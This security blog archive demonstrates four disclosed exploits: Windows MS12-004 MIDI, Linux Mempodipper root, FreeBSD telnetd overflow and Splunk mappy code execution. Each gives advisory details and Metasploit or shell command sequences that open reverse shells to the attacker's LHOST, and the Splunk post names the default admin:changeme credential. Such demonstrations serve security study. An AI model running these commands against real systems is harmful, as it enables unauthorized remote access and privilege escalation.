Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Exploits,

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

CVE-2011-4862 FreeBSD Telnet Buffer Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability exploited in the wild
Public release of the vulnerability the 2011-12-23
Metasploit PoC provided the 2011-12-27

PoC provided by :

Jaime Penalba Estebanez
Brandon Perry
Dan Rosenberg
hdm

Reference(s) :

CVE-2011-4862
OSVDB-78020
FreeBSD-SA-11:08.telnetd

Affected version(s) :

All supported versions of FreeBSD.

Tested on FreeBSD 8.1-RELEASE

Description :

This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.

Commands :

use exploit/freebsd/telnet/telnet_encrypt_keyid
set RHOST 192.168.178.112
SET PAYLOAD bsd/x86/shell/reverse_tcp
set LHOST 192.168.178.100
exploit

id
uname -a

CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo

Event Management, Exploits, Log Management, Metasploit

Timeline :

Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability the 2011-12-12
Metasploit PoC provided the 2011-12-22

PoC provided by :

Gary O’Leary-Steele
juan vazquez

Reference(s) :

CVE-2011-4642
OSVDB-77695
SPL-45172

Affected version(s) :

Splunk 4.2 to 4.2.4

Tested on Ubuntu 10.04.3 LTS with :

Splunk 4.2.4

Description :

This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.

Commands :

use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a